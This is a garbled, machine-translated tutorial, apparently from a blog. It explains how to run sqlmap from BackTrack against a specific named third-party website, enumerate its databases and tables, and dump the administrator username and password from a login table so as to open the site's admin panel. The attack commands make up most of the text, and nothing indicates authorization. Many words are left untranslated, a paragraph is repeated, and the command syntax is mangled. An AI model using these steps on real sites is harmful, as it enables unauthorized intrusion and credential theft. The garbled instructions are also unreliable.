sqlmap with this hack SQL vulnerable sites [backtrack]

Today I will share with you how to use the SQL bhalanarebala sqlmap Linux backtrack's Website Hacking inventory.

http://www.ewastrusinska.com/page.php?id=1 this page is sql vulnerable. Now, let's login ID and pasayarda of this site's eyadamina it.

Open the VMware or Virtual Box with backtrack.

Then restart Terminal. The dekhabeh

Write the "cd / pentest / database / sqlmap"

And press enter. The dekhabeh

Then you will see the blue text does. From now on, every step will be to write this article after the command.

The calendar should write "ls" and then press enter. The dekhabeh

Then Write "python sqlmap.py"

If it dekhabeh

I Write "python sqlmap.py-u http://www.ewastrusinska.com/page.php?id=1 - dbs"

And press enter. The dekhabeh

Here you will see [y / N] contains. With "y" and press enter and enter again.

The dekhabeh

Highlight the database are showing.

The database columns from a table and you will find out. The-u,-D,-T,-C command has been used to dissolve.

-u specifies URL,-D specifies database,-T and-C means means table column.

I Write "python sqlmap.py-u http://www.ewastrusinska.com/page.php?id=1-D www - tables" and press enter.

The dekhabeh

Highlight the database are showing.

The database columns from a table and you will find out. The-u,-D,-T,-C command has been used to dissolve.

-u specifies URL,-D specifies database,-T and-C means means table column.

I Write "python sqlmap.py-u http://www.ewastrusinska.com/page.php?id=1-D www - tables" and press enter.

The dekhabeh

The "1" and press enter and enter again.

The dekhabeh

Highlighted in the panel's website eyadamina iusaranema found. Username: admin

It will pasayarda out. That is why I have to enter the same command. The column's name will be added password.

Erakamah "python sqlmap.py-u http://www.ewastrusinska.com/page.php?id=1-D www-T es_cms_gb_login - C password - dump" and press enter.

Well done ...

Password to get him

Thats The Way to open a panel. The log file